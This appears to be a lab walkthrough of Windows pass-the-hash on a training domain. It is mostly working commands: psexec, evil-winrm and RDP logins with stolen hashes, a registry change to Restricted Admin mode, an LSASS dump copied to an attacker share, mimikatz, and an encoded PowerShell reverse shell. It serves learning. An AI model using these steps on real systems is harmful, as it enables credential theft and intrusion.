Pass the Hash (PtH)
June 10, 2024

NT hash recovered for the Administrator account:
Administrator:30B3783CE2ABF1AF70F77D0660CF3453

impacket-psexec takes it in LMHASH:NTHASH form, so the LM half is left empty before the colon:
impacket-psexec Administrator@10.129.74.50 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

First we get a shell as Administrator with evil-winrm, passing the hash with -H instead of a password:
./evil-winrm.rb -i 10.129.74.50 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
RDP does not accept a hash by default, so from that shell we enable Restricted Admin mode (setting DisableRestrictedAdmin to 0 turns the mode on):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

With Restricted Admin mode enabled we can use xfreerdp with /pth: to RDP into the machine with the hash:
xfreerdp /v:10.129.74.50 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

# First we set up an SMB share on the attacker machine to receive the dump
mkdir TmpShare
sudo impacket-smbserver share -smb2support TmpShare
# Then, from the Windows box, move the LSASS minidump over to the attacker's share
move C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass.DMP \\10.10.14.147\share

Then we parse the minidump with pypykatz to pull out the cached credentials:
pypykatz lsa minidump lsass.DMP

pypykatz gives us david's NT hash:
david:c39f2beb3d2ec06a62cb887fb391dee0
The command below runs mimikatz's sekurlsa::pth, which starts a new cmd.exe whose network logons use david's hash (locally, whoami still shows the original user; only outbound authentication changes):
mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exit
From that cmd we can read david.txt as david, which is the pass-the-hash result we were after.

Now we repeat the same command as julio, using the NTLM hash pypykatz recovered earlier:
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:cmd.exe" exit
From the new cmd we can read julio.txt the same way.

For Invoke-TheHash we first need a reverse shell payload pointing back at our machine (the base64 below is an encoded PowerShell TCP reverse shell to 172.16.1.5:443).

Attacker Machine IP / MS01 - 172.16.1.5 (the address encoded in the payload below)
Victim Machine IP / DC01 - 172.16.1.10
Then we open a cmd as administrator, switch to PowerShell, and import the module:
powershell
cd Tools\Invoke-TheHash
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Start the listener before running Invoke-WMIExec above; once DC01 connects back we are running as julio:
nc -lnvp 443
whoami
cd C:\julio
dir
more flag.txt

Running pypykatz over the minidump again gives us john's hash, which goes straight into evil-winrm:
pypykatz lsa minidump lsass.DMP

john:c4b0e1b10c7ce2c4723b4e2407ef81a2
./evil-winrm.rb -i 10.129.230.115 -u john -H c4b0e1b10c7ce2c4723b4e2407ef81a2



